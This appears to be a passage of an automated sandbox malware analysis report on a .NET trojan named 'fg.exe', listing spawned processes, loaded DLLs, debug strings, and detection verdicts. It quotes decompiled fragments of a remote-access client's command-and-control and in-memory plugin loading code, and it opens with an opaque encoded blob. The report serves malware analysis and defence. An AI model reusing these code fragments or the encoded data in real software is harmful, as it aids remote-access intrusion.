RRBC346CzAtCSRwSD0tdloWQkkMVRUTFUVuc2had0xnOgd2WhZBDEIRRwtJIQs9RXBaO2c6KlxaFkJJDwdQCUcnCnMJKh48YBAHdlpGEABaFEELDjsQMjwTNBE4VVQjF1M2AV4QVApqLQg2LxsjVEpiQiUPWwc9RAdQD0poWXMEFTZVK0BOaihTERxBEGEGXC0FNwwfO1QNUVMzRB4lDFg0RQdgKQk2O1J+alptC3Y9UxYoXBx7D0MtF3thIWVsQwsqXFoWQklcB1wYTzwBczsONkUDUwcFH0I1BltDATpGOgEyLDk4Xx5VXyI+Uw4MSxRBCw4bAScfFSAHXmRPJB9XBipDG0ELVjxEbmg2OFAOcVc/RmUHHXsaQlgaHAwhLRszcgVeUzMCQiYMQBBSD1otWnsPHyNwGllpNxdTEUEFLgUzAmgjNjw7J1gkUUozCR5LMh8oHFUjQkRzaFonQwNGRiIfFhEdTQFcDQ4bASccEiVUC1RkORRCBxFYMVACSy8FJy1aBFQeZE8kH1cGKkMbQQtWPERuaDY4UA5xVz9GZQc
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.5150600.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.5150600.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e.csproj_161H6
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@12/13@1/1
            Source: C:\Users\user\Desktop\fg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fg.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\QsOwMXrJgXTZTM1E
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3708:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess516
            Source: C:\Users\user\Desktop\fg.exeFile created: C:\Users\user\AppData\Local\Temp\cy31atwyJump to behavior
            Source: fg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: fg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\fg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: fg.exeVirustotal: Detection: 66%
            Source: fg.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\fg.exe "C:\Users\user\Desktop\fg.exe"
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP"
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP"Jump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\fg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: fg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: fg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: fg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: System.Configuration.pdbL0uw# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb< source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: %%.pdb(s( source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbngVideMRw source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbs>x source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbK> source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb(@ source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbr2 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uild.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: HPjo0C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb@\ source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbP source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: ?voC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbI source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: @vo.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2856933823.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Drawing.pdb| source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb~ source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32##5 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Messages.cs.Net Code: Memory
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Messages.cs.Net Code: Memory
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: fg.exeStatic PE information: 0xE97D9049 [Thu Feb 18 08:31:05 2094 UTC]
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"
            Source: C:\Users\user\Desktop\fg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_011B7DA0 push eax; iretd 12_2_011B7DA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllJump to dropped file
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\fg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
